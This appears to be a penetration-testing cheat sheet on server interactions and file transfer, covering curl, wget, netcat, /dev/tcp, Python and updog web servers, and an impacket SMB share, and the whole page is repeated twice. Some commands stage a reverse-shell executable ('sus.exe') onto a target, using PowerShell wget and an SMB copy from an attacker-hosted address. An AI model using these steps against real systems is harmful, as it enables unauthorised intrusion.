Server Interactions

Interact with Servers

curl -v http://<ip>

Access a website

curl -X POST http://website -d 'username=user&password=pa$$word'

Use POST method to login to website

curl -o stuff.html http://website/stuff.html

Save to file

wget https://website.com/file.txt

Pull specified file

wget -r http://<ip>

Download all files recursively

wget -r ftp://<ip>

Download the files from FTP server

ftp <ip>

Connect to FTP

sftp <ip>

Secure FTP

powershell -c wget http://<localIP>:8080/sus.exe -outfile sus.exe

Download from URL

Send Cookie settings with data, then pipe results:

curl 'website' -H 'Cookie: name=user; settings=1,2,3,4,5,6,7' --data 'name=User' | base64 -d > item.png

Connect and send HTTP Request.

nc www.example.com 80

This will take you to a blank line. This means you are connected but will display nothing until you send a HTTP request

GET / HTTP/1.1

GET /

Interact with a webpage using /dev/tcp:

exec 3<>/dev/tcp/www.google.com/80

echo -e "GET / HTTP/1.1\r\nhost: http://www.google.com\r\nConnection: close\r\n\r\n" >&3

cat <&3

Create a Server

Python

python3 -m http.server

Creates a Python HTTP server

python3 -m SimpleHTTPServer

Creates a Python HTTP server

There is no indexing with this method.

You need to know exact file location when pulling a file.

Updog

updog

Serve from your current dir

updog -d /dir

Serve from another dir

updog -p 1234

Serve from port 1234

updog --password pa$$word

Password protect the page

Updog --ssl

Use an SSL connection

pip3 install updog

Install Updog

Note: updog uses HTTP basic authentication.

To login, you should leave the username blank and just enter the password in the password field.

https://github.com/sc0tfree/updog

Netcat

Serve a basic webpage

nc -lp 1234 < index.html

This will serve the page only once then quit

while true; do nc -lp 8080 < index.html; done

This will keep it up until you stop it

Pulling a webpage

Connect and send HTTP Request.

nc www.example.com 80

This will take you to a blank line. This means you are connected but will display nothing until you send a HTTP request

GET / HTTP/1.1

GET /

SMB server

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py <yourHostname> .

Transfer to windows using SMB. Put your reverse shell in the pwd and run this on the target:

copy \\10.10.10.1\<YourHostname>\sus.exe C:\sus.exe

PreviousNetcat Relays NextAlternate Methods

Last updated 1 year ago

Was this helpful?

Server Interactions

Interact with Servers

curl -v http://<ip>

Access a website

curl -X POST http://website -d 'username=user&password=pa$$word'

Use POST method to login to website

curl -o stuff.html http://website/stuff.html

Save to file

wget https://website.com/file.txt

Pull specified file

wget -r http://<ip>

Download all files recursively

wget -r ftp://<ip>

Download the files from FTP server

ftp <ip>

Connect to FTP

sftp <ip>

Secure FTP

powershell -c wget http://<localIP>:8080/sus.exe -outfile sus.exe

Download from URL

Send Cookie settings with data, then pipe results:

curl 'website' -H 'Cookie: name=user; settings=1,2,3,4,5,6,7' --data 'name=User' | base64 -d > item.png

Connect and send HTTP Request.

nc www.example.com 80

This will take you to a blank line. This means you are connected but will display nothing until you send a HTTP request

GET / HTTP/1.1

GET /

Interact with a webpage using /dev/tcp:

exec 3<>/dev/tcp/www.google.com/80

echo -e "GET / HTTP/1.1\r\nhost: http://www.google.com\r\nConnection: close\r\n\r\n" >&3

cat <&3

Create a Server

Python

python3 -m http.server

Creates a Python HTTP server

python3 -m SimpleHTTPServer

Creates a Python HTTP server

There is no indexing with this method.

You need to know exact file location when pulling a file.

Updog

updog

Serve from your current dir

updog -d /dir

Serve from another dir

updog -p 1234

Serve from port 1234

updog --password pa$$word

Password protect the page

Updog --ssl

Use an SSL connection

pip3 install updog

Install Updog

Note: updog uses HTTP basic authentication.

To login, you should leave the username blank and just enter the password in the password field.

https://github.com/sc0tfree/updog

Netcat

Serve a basic webpage

nc -lp 1234 < index.html

This will serve the page only once then quit

while true; do nc -lp 8080 < index.html; done

This will keep it up until you stop it

Pulling a webpage

Connect and send HTTP Request.

nc www.example.com 80

This will take you to a blank line. This means you are connected but will display nothing until you send a HTTP request

GET / HTTP/1.1

GET /

SMB server

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py <yourHostname> .

Transfer to windows using SMB. Put your reverse shell in the pwd and run this on the target:

copy \\10.10.10.1\<YourHostname>\sus.exe C:\sus.exe

PreviousNetcat Relays NextAlternate Methods

Last updated 1 year ago

Was this helpful?